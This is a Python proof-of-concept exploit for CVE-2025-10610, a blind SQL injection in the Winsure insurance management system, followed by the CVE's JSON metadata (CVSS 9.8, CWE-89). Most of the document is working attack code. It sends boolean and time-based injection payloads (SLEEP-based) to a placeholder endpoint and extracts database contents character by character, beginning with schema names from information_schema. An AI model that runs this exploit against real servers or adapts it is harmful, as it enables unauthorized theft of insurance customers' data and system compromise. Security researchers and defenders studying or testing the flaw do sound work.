CVE-2025-10610

# CVE-2025-10610 - Winsure Blind SQL Injection PoC # Vulnerability: Blind SQL Injection in Winsure Insurance Management System # Discovered by: USOM ([email protected]) # Affected: Winsure through Version dated 21.08.2025 import requests import time TARGET_URL = "http://target-winsure-server.com/vulnerable_endpoint" INJECTION_PARAM = "id" # Adjust based on actual vulnerable parameter def check_boolean_blind(url, param, payload_true, payload_false): """Boolean-based Blind SQL Injection detection""" # Normal request to get baseline response r_normal = requests.get(url, params={param: "1"}) len_normal = len(r_normal.text) # True condition payload r_true = requests.get(url, params={param: payload_true}) # False condition payload r_false = requests.get(url, params={param: payload_false}) if len(r_true.text) != len_normal and len(r_false.text) == len_normal: return True return False def extract_data_time_based(url, param, query): """Time-based Blind SQL Injection data extraction""" # MySQL time-based payload example payload = f"1' AND IF(({query}), SLEEP(5), 0)-- -" start = time.time() requests.get(url, params={param: payload}) elapsed = time.time() - start if elapsed >= 5: return True return False def extract_string_time_based(url, param, table, column, row_id=1): """Extract string data using time-based blind SQLi""" result = "" for pos in range(1, 50): for ascii_val in range(32, 127): query = f"ASCII(SUBSTRING((SELECT {column} FROM {table} LIMIT {row_id-1},1),{pos},1))={ascii_val}" if extract_data_time_based(url, param, query): result += chr(ascii_val) print(f"[+] Extracted so far: {result}") break else: break return result # Example usage if __name__ == "__main__": print("[*] Testing for Blind SQL Injection in Winsure...") # Boolean-based test true_payload = "1' AND '1'='1" false_payload = "1' AND '1'='2" if check_boolean_blind(TARGET_URL, INJECTION_PARAM, true_payload, false_payload): print("[+] Boolean-based Blind SQL Injection confirmed!") # Time-based test if extract_data_time_based(TARGET_URL, INJECTION_PARAM, "1=1"): print("[+] Time-based Blind SQL Injection confirmed!") # Extract database name db_name = extract_string_time_based(TARGET_URL, INJECTION_PARAM, "information_schema.schemata", "schema_name", row_id=1) print(f"[+] Database name: {db_name}")

{"cve": {"id": "CVE-2025-10610", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:36.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SFS Consulting Information Processing Industry and Foreign Trade Inc. Winsure allows Blind SQL Injection.This issue affects Winsure: through Version dated 21.08.2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0337", "source": "[email protected]"}]}}